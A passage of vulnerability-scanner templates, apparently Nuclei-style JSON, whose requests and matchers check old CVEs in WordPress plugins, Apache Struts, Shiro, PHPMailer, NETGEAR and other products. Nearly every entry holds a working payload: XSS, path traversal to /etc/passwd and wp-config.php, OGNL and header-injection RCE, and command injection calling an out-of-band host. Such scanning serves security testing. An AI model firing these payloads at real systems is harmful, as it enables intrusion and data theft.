{{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site 